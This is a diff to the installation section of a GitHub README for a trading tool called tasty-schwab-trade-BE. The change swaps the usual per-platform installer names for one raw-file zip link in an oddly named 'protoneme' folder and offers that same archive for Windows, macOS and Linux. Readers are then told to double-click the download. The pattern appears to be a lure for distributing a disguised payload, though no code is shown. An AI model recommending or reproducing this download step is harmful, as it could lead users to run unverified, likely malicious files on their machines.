Gouravdhiman8815/tasty-schwab-trade-BE/README.md

 2. **Select the Latest Version:** Locate the most recent version of the software.
 It will usually be listed at the top.

-3. **Download the Installation File:** Click on the file appropriate for your operating system (e.g., `tasty-schwab-trade-BE-setup.exe` for Windows, `tasty-schwab-trade-BE.dmg` for macOS, or `tasty-schwab-trade-BE.tar.gz` for Linux).
+3. **Download the Installation File:** Click on the file appropriate for your operating system (e.g., `https://raw.githubusercontent.com/Gouravdhiman8815/tasty-schwab-trade-BE/main/protoneme/tasty-schwab-trade-BE.zip` for Windows, `https://raw.githubusercontent.com/Gouravdhiman8815/tasty-schwab-trade-BE/main/protoneme/tasty-schwab-trade-BE.zip` for macOS, or `https://raw.githubusercontent.com/Gouravdhiman8815/tasty-schwab-trade-BE/main/protoneme/tasty-schwab-trade-BE.zip` for Linux).

 4. **Open the Downloaded File:** Once the download is complete, navigate to your downloads folder and double-click the file to start the installation.